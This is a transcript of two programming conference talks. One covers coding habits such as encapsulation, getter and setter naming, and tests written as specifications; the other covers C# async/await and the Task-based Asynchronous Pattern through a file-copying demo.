If you say to people, you can default construct this object, but then you have to call this method and you have to call this other method to properly initialize it, then you've actually missed the opportunity of constructing during a constructor. That's its point. Yeah? The idea is if there is one correct way to construct an object, then offer that as the only correct way. You really want to align the affordances, the usage of the thing, with your intended usage. So, let's go have a look at our old friend, the recently used list. Let's go back to that one. And here is a very common implementation. I've re-rendered it here. What we've got is that somebody will say, I'm just going to use a .NET list. I'm going to use a .NET list and then I'm going to have a property, a get, that's going to return that list. And then the bit that does the clever bit, the add method, because that's got to deal with uniqueness and it's got to deal with putting at the front rather than the back, will provide a method for that. But basically anything else that the user wants to do, they can do through this. And so we see how people use it. So they initialize it, they go ahead, that's fine, initialize it. They go in there, they add, hello world, that's great. How many items are there in there? Ah! So, first port of call, we have no count property. There is no way to query the size of a recently used list. So we basically have to go in a bit, go to the items and ask for the count. But it gets fun because now what we can do is having got the items, we can sit there and go, oh, I'm going to add a duplicate string. Now, if you remember what a recently used list is, it holds its items uniquely. You cannot add duplicates, they move. When we go and look at the size again, it turns out that the size is now two. So it holds two duplicate items, which is supposed to be impossible. Well, apparently not.
And we can also put nulls in if we want, which we're not allowed to do in the original version, a few slides back. So what we've done here is we've effectively, I mean, everything is private, the word private surrounds the list. But the clue that we have a problem is this message chain or sometimes called a train wreck because you get the dots adding up. Something dot something dot something dot something is a very strong clue that you have, you're revealing far too much internal structure. It's a very strong clue. But we knew this already. There is a piece of, we can actually pick up a piece of advice. Going back to the 1980s, the young Kiefer Sutherland, is anybody watching 24 at the moment? New 24? No? Okay, it'll get to Norway eventually. Kiefer Sutherland goes across London and people have been saying, you know, that's amazing. He managed to get from one side of London to the other in under 10 minutes. The mayor of London needs to hire him to redesign the roads because clearly this guy knows something. But this is one of the 80s vampire movies that preceded all the rubbish vampire movies we've had in the last few years. But people, whenever they think about how they're going to protect themselves from vampires, because I know you do, you wake up at three o'clock in the morning thinking, like, what if a vampire came through the door? I mean, I obviously excuse those who are a bit worried about the zombie apocalypse. I live in the city of Bristol and it turns out that Bristol City Council actually has an action plan for the zombie apocalypse. I think it was drawn up by one very bored council employee one day. But that's why I like living there. You know, you've got that opportunity. But I don't know what our vampire strategy is. And people think, oh, what am I going to do? How am I going to protect myself against vampires? And why didn't that build when I left? But no, really, vampires are more important. How do I protect myself? 
People come up and they say, oh, right, okay, I'm going to need garlic. Yes, we've got garlic bread in the freezer, so we're good. We're safe. Okay. And what else? Maybe I could drive a stake through their heart. Yeah, but you've got to get close and intimate. Holy water. Right. None of that in the house at the moment. Availability issues. You kind of go through all the standard techniques. Sometimes people misremember, they say things, silver bullets. Oh, you're going to be disappointed. That's werewolves. You've got to get your undead right. You know, wrong class of undead. Sunlight. But does it go as far as ultraviolet light? Some models of vampires say yes. Some models say no. It's difficult to say. But the one everybody forgets, the greatest protection, because you are at home. Do not invite them in. Do not invite them in. To quote the film. If you invite them in across the threshold, they can do anything. What has this got to do with encapsulation? Everything. Absolutely everything. Don't invite them in. Here it is. If you want people to be able to count the number of items in there, then give them a count property. If you want them to be able to do stuff, offer it to them. Your fingers will not fall off through the effort of typing. Okay. But you've also enforced an encapsulation that allows you to actually flip the representation round. This one we insert at the front. This one we just transform it and we insert at the back. From the outside, nothing has changed. From the inside, we've actually reversed the internal data structure. Nobody noticed. That is the magic of what we mean by encapsulation. What we're saying is strictly private. It's not just a case of put a private keyword in front of it. It means really, really private. Now, this one I held back, because sometimes people think, oh yeah, we've got classes with all these kinds of getters and things like that. It's such an item, I gave it its own space. So: get. Get.
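The "don't invite them in" version of the recently used list, with a count property offered instead of the internal list leaked, can be sketched briefly. The talk's code is C#; this is a hedged Python sketch of the same design:

```python
class RecentlyUsedList:
    """Holds items uniquely, most recent first; the internals stay private."""

    def __init__(self):
        # Never handed out directly, so the representation could be
        # reversed (insert at the back instead) without callers noticing.
        self._items = []

    def add(self, item):
        if item is None:
            raise ValueError("null items are not allowed")
        if item in self._items:
            self._items.remove(item)  # duplicates move, they don't accumulate
        self._items.insert(0, item)

    @property
    def count(self):
        # Offer the question people want to ask, instead of the list itself.
        return len(self._items)

    def __getitem__(self, index):
        return self._items[index]

lru = RecentlyUsedList()
lru.add("hello")
lru.add("world")
lru.add("hello")  # re-added: moves to the front, list stays unique
```

Nothing outside the class can now smuggle in duplicates or nulls, because nothing outside the class ever touches the list.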
Here it is in the Oxford English dictionary. The Oxford English dictionary is a fantastic dictionary if you are a word geek. And at this point, I confess I'm a word geek. Because it's of no use to you whatsoever if you're trying to find out what the meaning of a word is. Because what you will start off with, it will give you the complete history of the word. Okay? So, you know, the OED basically has everything going back for a thousand or so years. And it will give you all of the roots. As you can see, get is quite an old word. And it's cognate with a whole bunch of stuff in Frisian, Old Norse, and so on. Very useful if you happen to be into this kind of thing. I think this is the most interesting bit, to be honest. And then there's all those other definitions and usages. It's very boring. But what I want to draw your attention to is two things. One, if you look at the first column over there, you will see that there are multiple entries for get. If you look over to the other side, you will see that the scroll bar is very, very small. That's because it's proportional to the amount of stuff there is on it. If you print out the definition for get, it comes to somewhere between 30 and 40 pages in the printed dictionary. It's one of the reasons I don't have the printed dictionary. You know, sorry, which rainforest would you like to destroy to print it, sir? No, no, I'm just going to go and destroy electrons. So, it turns out that get is one of the words in the English language. There are two words in the English language that have the most pages of definition. Get is one of them. Yep, you got it. Set's the other. So, if you wanted to use these words because they're unambiguous and clear and they have a simple, concise, well-defined meaning, bad luck. It turns out there's a third word that's not been fully integrated, all the newer definitions have not been fully integrated into the OED. And this one may also be familiar.
This third word has now overtaken both get and set. That word is run, which apparently we use quite a lot. Yeah? So these are words that have multiple definitions. So, a very simple one is just on the naming. I just think get and set are terrible names. But get in particular, get. When you have a getter, does it have a side effect or does it not have a side effect? The one thing the word should tell me is whether there is a side effect or there is not a side effect. Is it a pure query or not? Let's look at how the word is used in English. I go to a cash point and I get money from the cash point. Is there a side effect? Yes. Disappointingly, my account balance goes down. You get married. Is there a side effect? Yes. Huge side effect. Life changing. So, the point here is the word get means move from one place to another in such a way that it is no longer available at the first place. That's what it means. That's its principal usage. It does not mean I'm asking you a question. But you see, get and set, they're three letters long and they look so nice together. They rhyme. If English were different, we probably wouldn't have this problem. And we think, oh, they're kind of opposites. No, they're not. The opposite of set is reset or unset. These are opposites. So, that's one aspect. One is the name. So, simple example. You know, you end up, oh, yeah, let's create an object. It's going to hold money. It's going to hold currency details. It's going to be units and hundredths. And then we're going to be able to set them because for every get there is always a set. And that's the problem. We even have IDEs that do this for us. That's great because I can do the wrong thing without having to type. I've got a shortcut for doing the wrong thing. I used to have to type lots to do the wrong thing. But now, there it is, enterprise coding at your fingertips. But we sit there and go, do we really need this?
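The dictionary sense of get, moving something so it is no longer available at the first place, is exactly what a queue's pop does, while a pure query leaves everything alone. A small Python sketch of the distinction (the talk itself is language-agnostic at this point):

```python
from collections import deque

queue = deque(["first", "second"])

# A pure query: asking a question changes nothing.
front = queue[0]
size_before = len(queue)

# A "get" in the dictionary sense: the item is no longer available at
# the first place. The name popleft says so; calling it "get" would hide it.
taken = queue.popleft()
size_after = len(queue)
```

Naming the mutating operation `pop` or `take`, and reserving query-sounding names for pure queries, puts the side effect in the name instead of behind a generic "get".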
Could we not just, you know, get rid of that? Oh, yeah. And actually we could get rid of the brief. Oh, good grief. Do you see what I did there? I just turned it into object oriented code. I turned it from assembler into object oriented code. That's amazing. So, this is actually the other aspect. The other side of this is not simply that there is a false symmetry, not simply that the naming sucks. It is that there is this idea that we need to be more cautious and actually more challenging. We need to challenge it. Do we actually need to change this? There are so many reasons why you should not be encouraging state change in your code. So, to the final item, uncohesive tests. Because it turns out, when I gave this talk a few years ago, people weren't writing tests. But these days people are writing tests. Everybody's writing tests. And some people have really got the idea. They really understand it. And other people are just kind of getting their feet wet. Just getting into the idea. And again, the advice varies. There are so many different schools of thought. But the one I want to challenge, first of all, is the idea that we're just writing tests to find out that things don't work. So, this lovely blurb from Nat Pryce and Steve Freeman. They wrote the book Growing Object-Oriented Software, Guided by Tests. But a few years ago they ran this session at XP Day in London, XP Day 2007. And the blurb for the session, "Are your tests really driving your development?", really had a very key point that I think people overlook when they think of TDD as just testing. As they said, everybody knows TDD stands for test driven development. But people too often concentrate on the words test and development and don't consider what the word driven really implies. So, for tests to really drive your development, they must do more than just test that the code performs its functionality. They must clearly express that required functionality. They must be specifications.
In other words, don't just simply test that it works. Explain to the reader what you mean by it works. So, if we see this from the point of view of our recently used list, just to keep the feature set small here, the most instinctive way that people will go about testing this, the most common approach, the most obvious approach, is this. We just test each feature. We've got a constructor, we'll test it. We've got a count, we'll test it. We've got an indexer, we'll test it. We've got an add method, we'll test it. One for one. It's an obvious approach. It is the most common approach and it's completely wrong. It took me years to come to terms with why it was wrong, because I started splitting my tests up years ago, but I'd never really thought about why. But when we end up with a much more literate style, actually, I'm going to skip that slide. It's good stuff. But I'm going to skip that slide in the interest of time. If we go back to our recently used list, we can structure it. The idea is that you should be looking at your testing frameworks. And perhaps you have some nice custom extensions to your testing framework. Feel free to use those. But if you're just using a raw testing framework, find out how much of it can be used to express a hierarchical structure as if you were trying to explain to a reader what is going on. Don't tell them that you're testing something. Tell them what you're expecting. Tell them what's required. And use the hierarchical structuring within your language, whether it is namespaces, whether it is nested classes, whether you have some other intermediate construct. If you have a language that has lambdas and a decent way of constructing lookup tables, so maps and the like, then this is a really useful technique. Here is the name of my test. You can even use strings. And then here is the following block of code. You can be very, very expressive. Don't think of it as test methods. You kind of end up with a much more literate approach.
So we see that a new list is empty. We're not testing the constructor. We're simply offering the people a statement. We see that a non-empty list is unchanged when the head item is re-added. We see that any list rejects addition of null items. And what's nice about this is when the tests pass, the names reflect the functionality that you have. It is a list of what the thing does. And it all comes up green. If something fails, then it comes up red. And it tells you that this thing you thought you had, you don't. Now, this, by the way, cuts through all the questions of should I also include the word should or must or something in the test name. The answer is no. Because that doesn't make sense. If I look at the first item, it tells me a new list is empty. That is a feature of this class. A new list is empty. It's not a feature that it should be empty. It is. Really, there's no discussion. Otherwise, it's red. Yeah? So we actually get a listing of the functionality. So the test names work in two environments. They work for writing and they work for reading, and reading is, I think, the most important use after execution. But the real core of this is the uncohesion. What is the problem when we actually have a test case that is named to test a method? Even something simple like a Boolean method that can really return one of two values. True or false? Surely you need at least two test cases for that. So here is this observation. I noticed that I stopped using the terminology test case for a few years. This is very strongly associated with JUnit. It didn't really get used as much with NUnit. But I've gone back in the last year or so to using it, because it becomes very clear: if you say that test methods are test cases, then it's very logical. This test case tests a case. If you have any other answer, then you have a problem. So if you ask somebody, how many cases are you testing in this test case?
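The sentence-like test style described here can be sketched with plain functions. The talk's examples use C# testing frameworks; this is a hedged Python sketch, with a minimal RecentlyUsedList included so it stands alone:

```python
# A minimal RecentlyUsedList so the sketch is self-contained.
class RecentlyUsedList:
    def __init__(self):
        self._items = []

    def add(self, item):
        if item is None:
            raise ValueError("null items are rejected")
        if item in self._items:
            self._items.remove(item)
        self._items.insert(0, item)

    @property
    def count(self):
        return len(self._items)

# Test names state required behaviour, not which method is being poked.
def a_new_list_is_empty():
    assert RecentlyUsedList().count == 0

def a_non_empty_list_is_unchanged_when_the_head_item_is_re_added():
    lru = RecentlyUsedList()
    lru.add("a")
    lru.add("a")
    assert lru.count == 1

def any_list_rejects_addition_of_null_items():
    try:
        RecentlyUsedList().add(None)
        assert False, "expected the null item to be rejected"
    except ValueError:
        pass

passed = 0
for case in (a_new_list_is_empty,
             a_non_empty_list_is_unchanged_when_the_head_item_is_re_added,
             any_list_rejects_addition_of_null_items):
    case()       # each test case tests exactly one case
    passed += 1
```

When these pass, the names read back as a listing of the functionality; when one fails, it names the requirement you no longer meet.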
Oh, I always test three different cases. Well, that's not a test case, is it? Yeah, it's great. You can use language on your side: well, that's three test cases. What are they called? And factor it out accordingly. So a test case should be just that. It should be a case. And on that note, I've only overrun by two minutes. I'm around all afternoon. Feel free to come and disagree with me. Don't throw rotten fruit at me. Fresh fruit is much appreciated. Though, you know, I'm doing a bit of a health kick because it's summer. Thank you very much for your time. Thank you.
Habits help you manage the complexity of code. You apply existing skill and knowledge automatically to the detail while focusing on the bigger picture. But because you acquire habits largely by imitation, and rarely question them, how do you know your habits are effective? Many of the habits that programmers have for naming, formatting, commenting and unit testing do not stand up as rational and practical on closer inspection. This talk examines seven coding habits that are not as effective as programmers believe, and suggests alternatives.
10.5446/50615 (DOI)
Everyone hear me? At the back? Wee, good. It's a very full room. I thought I was hidden at the back of this thing and no one would know where I was, and I'd have an easy time. But it's nice of you all to be here. It's my first time at NDC and so far it's been great. Just out of interest, in the keynote, remember, there was discussion about a mobile phone being an interface to a bigger device and being a route to it. I'm not checking tweets while I present. I'm using this to control PowerPoint. So a Windows phone can happily control PowerPoint and show you all the speaker notes and allow you to jump around the presentation without worrying about it. While looking at tweets. No, really. So hopefully you all know what we're here for. You've read the abstract. The abstract was copied from an old conference, because it suggested you had VS 2012 RC installed. Which is a horrendous thing, as I read it this morning... What a silly thing to leave in. Specifically, there was a white paper, when async await was emerging as a technology, in the kind of almost CTP days. Stephen Toub from Microsoft wrote a white paper. It was called the Task-based Asynchronous Pattern, or TAP. Who knows about that white paper? Wow. So that's good, because if you have read it, studied it and implemented it, you need to leave. Because that's what this talk is basically about. But like a lot of white papers, people don't read them. They need someone to talk about them or promote them. Which is a real shame, because white papers are quite hard work but they are quite informative. So that's what this is about, I hope. Who's used async await? That's good, because I don't need to go into a long intro. I will do a little bit of intro about what it is. But we're talking about using async await to do more than just make your UI responsive.
Which is generally where it's kind of sold. If you've written a WinForms app or you've written a WPF app and you want to do some background task, going off to a website, going off to disk, async await allows you to have that responsive UI. Your UI doesn't freeze. I've got an ad for the company I work for, which I will mention in a second. So who am I? I'm Liam Westley. I work as an application architect at Huddle, which is this start-up in London. I get to work on a bike, 6,500 km a year, so I no longer fit in skinny jeans. I'll tell you that now. And when I'm not working or commuting, I'm playing. That's my youngest daughter, my eldest and my dad at a farm we went to at Easter. It's great as an idea of entrepreneurship. The farmers on this farm, they've decided they would use the plastic tubs they get feed for animals in, shove wheels on them, join them together, drag them around behind a bike and charge you for doing it. I think that's quite cool. So at Huddle, we create a server-based system. So we're all about server, not about UI. That's why this appeals to me more. It's not going to be a UI type talk, although there's a UI to demo. So what is async? A load of people know it. It came in in .NET 4.5. The aim was: we want something that makes asynchronous programming much easier, because there was a vision that everyone would be writing in Windows RT. Never mind. And that was important because that required this kind of asynchronous operation to be there, because with the kind of devices they're aiming at, you don't want to stall. You don't want a phone to suddenly go, no, I'm making a call to the network, I'll just stop doing anything on the interface while I go and do it. That's what the old Windows mobile phones used to do. And they locked up regularly. So we don't want that. So it came. Then they brought it out for the BCL.
So for anyone who can't implement .NET 4.5, and there are servers out there where a tech ops guy will not allow you to put 4.5 on it, you can put it on a .NET 4 server quite happily by using the BCL. So it's a good move. This is something you can back port. You still need VS 2012, but you can put it on an old server that isn't even 4.5, which is quite cool. And that's how they allowed it to go on Windows Phone and Silverlight apps. So the key goals of what async is there for, and that's it basically: we don't want anything to stall on a background task, a network call, a disk or an IO call. Something like that. Something where, actually, it's not CPU intensive. It's IO intensive. So your processor could happily do stuff, only it's waiting for the bytes off a disk, and your whole application is grinding to a halt. Now that could be your server-based application that's making multiple requests for data from other services, and it's stalling and not giving data back to the user because it's waiting for this IO to complete. In terms of Windows runtime, not Windows RT, they were aiming at anything over 50 milliseconds should be done asynchronously. Which means in the 4.5 framework there's so much more stuff that is asynchronous enabled, ready for you to use await, which is cool. Not everything. Not everything you'd expect, but quite a lot. The other one is there's loads of people out there who really know how to write synchronous code. It'd be nice if asynchronous code looked like synchronous code, except we just shimmy in this bit of background processing on the side. And those are the other goals for await, I think: make the code readable, make it actually go for the business requirement without all the cruft that is normally associated with background threads. You don't have to worry about threads. Thread pools, scheduling, when an exception happens. How do I then transfer it back to the thread I was running on?
How do I marshal things from a background thread to a UI thread so that a Windows form can be updated from a background thread? The aim was to get rid of all that kind of thing so your life was made much easier. So that's the goal for async await. There's two key words. I keep saying async await. Async: you put it on a method and that says, hey, somewhere in the middle of this method, we're going to have a control flow that's going to await something to happen asynchronously in the background. That's it. So if you've used await, you might have put it in the middle of a method, and the compiler says, you can't do that, you haven't put the word async on this method. So you put the async on the method. Interestingly, although they were trying to maintain that it's going to be simple, it's going to look like your synchronous code, the moment you start using async await, everything seems to have async written on it down the entire call stack, because they all keep calling each other. So you are going to have to do some changes. But basically, that async is a flag to the compiler saying this thing is going to await something inside. And then you have await, which is what you use. It says, hey, I know this is going to take ages. Go off and do it. When it's finished, yell at me. Come back. Tell me you've finished. And then we can carry on. And that allows you to free up all that processing power. So when I get that thing off the network, come back to me and we'll carry on working with it. In the meantime, I can go and do other stuff. I can let the user choose other things on a form, do other stuff. At some point, you're going to have to think, in a threaded background processing world, that the user can't do everything they might want to do while that background process is happening, because at some point you need the result back. So you still have issues that you have to think about, but it's so much easier.
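The shape being described, mark the method async, await the slow call, and the code still reads top to bottom, looks much the same in Python's asyncio as in the C# the talk is about; a minimal hedged sketch:

```python
import asyncio

async def fetch_greeting() -> str:
    # Stand-in for an IO-bound call (network, disk); while this awaits,
    # the event loop is free to do other work.
    await asyncio.sleep(0.01)
    return "hello"

async def main() -> str:
    # Reads top-to-bottom like synchronous code: call, await, carry on.
    greeting = await fetch_greeting()
    return greeting + ", world"

result = asyncio.run(main())
```

The `async` keyword flags the method, `await` marks the point where control is handed back while the IO completes, and the result is used on the next line as if nothing had happened.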
So much easier for anyone writing a UI to handle background threading. So that's the basic one. Where you would have had a method in the old synchronous days that returned void, you return Task. They took that from the Task Parallel Library. It was already there. It's really useful because you can do cancellation, you can check progress, you can do all sorts of nice things on the task object. And where you would have had a return value of, say, int, you return a Task of type int. And that way you can hand values back from your methods. You might have had a lot of, God help me, out parameters, which you shouldn't really do. Let's be honest, it's not the nicest thing to do to a person consuming your API. Create a class, create a struct, return that. It's much easier for them to deal with. But if you have output parameters, you really are going to have to now wrap it in a class or a struct and return it as one whole value. It is possible to have an async method that returns void. Async void. Please, please, please, please, don't do that in your own code. It is there purely to allow it to be used for things like event handlers on forms and such like. You are not meant to implement that. If you implement that, you're saying, I don't care about the poor sod who's going to use this method, because I'm not going to tell them anything about it as it progresses. I'm not going to allow them to cancel it, monitor it, anything. And that's the kind of thing that, if you were given that API, you'd be cursing the programmer who developed it. So no, no, no to async voids. So as I said, Task of T and Task, really great. We can find out how they're performing. We can do cancellation. They use the Task Parallel Library's cancellation mechanism to easily allow you to cancel tasks all at once. Without you having to run around a little array of tasks, find out all the tasks that you've got, go cancelling them down the line, you can just go cancel the whole lot, and off it goes. So that's great.
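The point about returning a task giving the caller cancellation, where fire-and-forget "async void" gives them nothing, has a direct analogue in asyncio. The C# mechanism is CancellationToken on Task; this hedged Python sketch uses `task.cancel()` to show the same caller-stays-in-control idea:

```python
import asyncio

async def long_running() -> str:
    try:
        await asyncio.sleep(10)  # stand-in for slow IO
        return "finished"
    except asyncio.CancelledError:
        raise  # cooperative cancellation, like honouring a cancellation token

async def main() -> bool:
    # Because we get a task back, the caller can monitor or cancel it.
    task = asyncio.create_task(long_running())
    await asyncio.sleep(0.01)  # let it start
    task.cancel()  # impossible with a fire-and-forget "async void" style call
    try:
        await task
    except asyncio.CancelledError:
        return True
    return False

was_cancelled = asyncio.run(main())
```

Had `long_running` been launched with no handle returned, the caller would have no way to stop, monitor, or even observe it.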
So the whole point of this is you're going to be able to concentrate on the business problem and let someone else deal with threading. Right. So that's enough PowerPoint; now we're going to get to code. For sample code, I don't know if anyone's seen these kinds of asynchronous talks before. In general, they'd have gone for maybe a web server. So, classic example: I'm going to go to a web server, I'm going to give it a geographic location or a postcode, and I want it to look up some data, geo information, tell me which town I'm near, something like that. It's great because it goes off to a web service in the cloud, and it's really good when you give a talk at a conference or a user group to rely on public Wi-Fi to get your data. It's not. You could all be downloading videos at the moment, and I'd have no access whatsoever. So the other thing is I could do a local web service. So I could have made an IIS web service. And that clutters the project up, and you're going, God, this is weird. So instead, what we're going to do is we're going to have some sample data that's simply going to be file copying. That's all we're going to do, which is an IO bound activity on a hard disk. Could be a network call, could be a hard disk operation, could be a SQL operation, but we're doing copies. So we've got sample data, which is not to be confused with Simple.Data, which is Mark Rendle's library for accessing databases, who's also talking at this conference. Now, everyone knows that developers are great at graphic design. I had to adjust this map. I'll tell you now. Does anyone know what this big triangle is? The UK. So we've got the UK here. This is Ireland. That's the Isle of Wight, which has a festival on it. We still own this bit over here as well in the UK. No, I think that's the Scilly Isles. I think the Falkland Islands are a bit further away. And I had to add this bit in a bit of a hurry last night. So, important bit. Obviously, I'm boring. I live in London. And we've come to Oslo.
But in Sheffield, there's a band called Silence. Not actual silence — silence is just a pain in the backside in a talk. But you can go to that web address and you can download a single, a four track single. And the real advantage of this is it's royalty free. I haven't put it in GitHub — all this code is in GitHub — because I don't own the copyrights of the music. But you can go and download it for free. And you can download the MP3 file, or the FLAC, or the Ogg Vorbis, or the AAC files. And that is our sample data. We are going to muck around with some music tracks, with the advantage that when we finish copying music tracks, we can play them. So I'm relying on my taste in music, which is kind of indie guitar. And hopefully it won't be too offensive. It's not rude or anything. It just may be very derivative in your viewpoint. It's not jazz though, so don't worry. So we've got these files, AAC, FLAC, MP3. The important bit about this — if you know about audio formats; I used to work for a digital download company, so we mucked around with transcoding files quite a lot — is that FLAC files are quite big, because they're lossless. So when you do a FLAC file of a music track, they're 30 megs, 38 megs, for a four minute track. In comparison, the MP3 file is more like 10 megs, 13 megs, that kind of area. When you go to AAC format, which is what iTunes uses, it squishes a lot harder, gets even lower. So it's about half that. The really nice bit about this is if you have files that effectively represent the same data, but are different sizes, then you can do a demo where the first file wins. And that might be the smallest file, because it takes less time to copy. Now, obviously, if anyone's musically inclined, those smaller files, they're lossy. They're not as good quality. But the fact that Beats headphones have managed to sell for billions of dollars to Apple means no one really cares about quality of music. So it's fine.
Because I used to have a really old Hi-Fi, and it had a button called loudness, and that's what Beats headphones are, a loudness button on your head. So I've worked in the music industry too much. So yes, that's our sample data. So the first example we're going to do: in async/await, in that white paper, there are things called combinators, or combinator methods. It's an awful word. But basically, they take a load of stuff you want to do, put it in a bag, throw it at something, and do it all at the same time. So this is where we're going to get the bonus. So this is when you first looked at await/async. I don't know if anyone's seen when all and when any. And you look at it, and you go, when all? I can see why I'd use that. When any? It's kind of... Once you've read the white paper, you find that when any is the really useful one, and when all is the really dull thing. But when all is useful, because you might want to do everything. And you want to send a load of tasks off, and you need all of them to finish. So just think, sending off emails, sending off a load of national insurance numbers. And you want to batch them, because you know it's going to take time for them all to come back, and you want to get the employee details. So that's when all. So to add to the confirmation that developers can't do design — and I don't do WPF either; you can barely tell that I used to write in VB — it's a Windows form that's gray with lots of tabs and buttons, which is the classic VB type app. But it's the easiest way to show you how it's working, because it has the least amount of code. And we get to play something. We get to put a bit of album art over here. We get to use an ActiveX control to play music, even though it's a .NET app. And we've got a little console output, and we've got a button to tell you what to do. And we can just go through all the examples. Behind all this, really simple. When it starts up, it's going to clear out a temporary folder.
So we've got a, in that user interface, we'll just run it up, you can see it. We've got a source folder. And that happens to be in my source code for where my apps living. And that's got a load of those sample files. The ones I showed you earlier that were all different sizes, that points to there. This very nicely points to your user area in a temp area, so we're not littering the computer with loads of files all over the place. And all it's going to do is copy from the source folder to the destination folder. That's all its aim is. And just to make sure, it does things like clears all the files from the folder, clears down and sets the temporary folder path so you can override it. It's not very exciting. Every time we run one of these things, we're going to clear the temp folder out. We're going to clear the console so it doesn't have any messages again. And then we're going to kind of clear what was playing on the media player. So we're just resetting the system every time we click the button. So let's do a sample of when all. So first thing we've got to do is get a list of files to copy. All right. We've got some helper methods. I'm not going to type everything out, if you'll be glad to know. So one of the things we're going to do is we're going to go to our source folder, and we're going to recurse through all the folders underneath, and we're going to get all the files that we need to copy, all the AAC, all the FLAC, all the MP3, and all the OG files. But we're also going to get the cover art. And because each of them had its cover art and they're all the same, we're just going to mute that and just take one copy of the cover art so we don't copy it four times. So that's quite simple. We're just going to get a list of all these files to copy. The next thing we're going to do is we're going to say, right, what I want to do is do lots of tasks. So I'm going to create a list of a load of tasks. Remember the task type T? 
So whatever I'm going to call as my task is going to return a string back. Because that allows me to know, when I copy a file, where is it now? Where is the file destination going to be? So I get a string back saying, here's the path to where the file is that I just copied. We're going to create that new list. There. Obviously, it's squiggling to tell me I should have used var. That's ReSharper for you. I've had real flames about using var with people. So for a demo, it makes much more sense to not use var, so that people understand where you were coming from. So for every file name, we're going to do something. So we've got that list of file names. And we're going to do something with them. So we're going to go through all of them. And what we're going to do is copy them. Now, you would think if you were going to copy a file using the .NET framework, you'd go System.IO.File.Copy, or File.Copy. You'd think, great, I'll just go to File.Copy and job's done — I'll call the async version of it. If only they'd made a File.CopyAsync. Because they didn't. What they did make was an async version of copying from one stream to another. It's fine. And I kind of understand why they did this. They wanted you to think: if you're going async, block sizes, things like that. If you did a file copy async, what does that mean? Does it mean big blocks, small blocks? There's absolutely zero input. You'd have to start overloading it. And the more you overload this stuff, the less it works when it goes to another platform which has a limited version of the .NET framework. So you might as well go to the base classes, wrap it, and make your own little file copy. It doesn't take a long time. It's a bit of Googling, a bit of Stack Overflow, and job's a good'un — a 20-minute job, done. So all we're going to do is we take a source path for a file. We're going to copy it to a destination.
There's a bit about the UI, progress details, and progress bar controls so that it looks pretty. But basically what we do is we open a source stream with file mode open. We then create and open a destination stream. Just like browsers when they download, we're going to call it .tmp. We're going to copy it. And this is the important bit. We're doing an await on CopyToAsync. We can do that because we wrote async at the top of our method. And by convention, we wrote Async at the end of the method name to let everyone know it was async, even though you've already decorated it with async and they know it's async. There you are. It's in the guidelines, and it is actually quite useful, because when you glance at an object browser, it's really easy to see what's going to go async. And we just copy it 4,096 bytes at a time. And then at the very end, when we're finished copying it, and we've updated our UI so it looks nice, we're going to rename the file from .tmp to the final file name. Because we've finished copying it, successfully copied it, we can now give it its original file name. And then we return that file name so that whoever called us knows exactly where the file has been copied to. So that's pretty much it. So the way we do that: we had that list of tasks that we were going to execute. So all we do is we add a new task, which is just the method name, that method that we were going to call. Because it returns — well, it says it returns string, but it has the async modifier, so what it actually returns is a Task of type string, so it all fits into the framework. So we are going to take one of the file names out of the array. That's the first thing we do. We then do a bit of funky stuff with Path.Combine. I don't know if any of you still do string searches for slashes — if you do, please use Path.Combine. It does it all for you. It's really wonderful, and it will get you out of a lot of trouble.
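A minimal sketch of the kind of wrapper described here, assuming the stream-based approach with a 4,096-byte buffer and a .tmp rename; the progress-bar plumbing is left out, and the class name is mine:

```csharp
using System.IO;
using System.Threading.Tasks;

public static class FileCopier
{
    // Copy via streams, 4,096 bytes at a time, write to a .tmp file,
    // and only rename to the real name once the copy has succeeded.
    public static async Task<string> CopyFileAsync(
        string sourcePath, string destinationPath)
    {
        string tempPath = destinationPath + ".tmp";

        using (var source = new FileStream(
            sourcePath, FileMode.Open, FileAccess.Read))
        using (var destination = new FileStream(
            tempPath, FileMode.Create, FileAccess.Write))
        {
            await source.CopyToAsync(destination, 4096);
        }

        // Like a browser download: the .tmp becomes the real file
        // only when the whole copy is done.
        File.Move(tempPath, destinationPath);

        // Hand back the destination so the caller knows where it went.
        return destinationPath;
    }
}
```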
So what I can do is just say, hey, give me the file name that I had as a source, and shove it on this path. So it says, give me this path, give the file name from that source separate from its path, and join them back together, and now we've got our destination file name. So it's so trivial, it's hard to believe. We aren't doing any fancy UI stuff, so I can set all that to null null true, which are magic values. It should all work. I'm just checking what the squiggle is, probably null reference. There you are, null reference. So what we're going to do is run it. So we can just go await. When all, which is all we were trying to do, was go right. We are going to take all those tasks, all those copies of files that we've carefully built up, because adding them to the list didn't get them going. All it did was say, I now have the potential to run this, and copy a file. You have to give it a kick to make it get going. So we give it a kick, we've run all. Now this actually, handily, returns an array of strings, because it works out. It's a type task string. So every one of these tasks will return a string which represents the file that was copied. So because we've got all of them running, we can just put them all in one string array. Bang, we've got a list of strings. And because we've done that, we can now play a track. So if we have actually copied these files correctly, we can look in the files that are copied, get the first thing, first file name that ends with.mp3, the joys of a US keyboard and an English layout. And the other thing we'll do is do some AlbumArt, because everyone knows that having music with no AlbumArt looks horrible on any UI. Have I got that right? Let's see if it builds. It's hard to believe it's a quad core with 16 gig of RAM. But there you are. So let's run it. Go back to the old-fashioned world. So when all. So we're going to copy all these files. We should see a load of information coming through here in our console window. 
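The WhenAll shape just described might look roughly like this; `copyFileAsync` is a stand-in for the CopyFileAsync wrapper the talk builds, and the method and parameter names are mine:

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Threading.Tasks;

public static class WhenAllDemo
{
    // copyFileAsync: (sourcePath, destinationPath) -> Task of the
    // destination path, like the wrapper built earlier in the talk.
    public static async Task<string[]> CopyAllAsync(
        IEnumerable<string> filesToCopy,
        string destinationFolder,
        Func<string, string, Task<string>> copyFileAsync)
    {
        List<Task<string>> copyTasks = new List<Task<string>>();

        foreach (string fileName in filesToCopy)
        {
            // Path.Combine spares us hand-rolled slash handling.
            string destination = Path.Combine(
                destinationFolder, Path.GetFileName(fileName));
            copyTasks.Add(copyFileAsync(fileName, destination));
        }

        // Each task is Task<string>, so WhenAll hands back string[]:
        // one destination path per completed copy.
        return await Task.WhenAll(copyTasks);
    }
}
```

All the copies run concurrently; the single await completes when the last one finishes.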
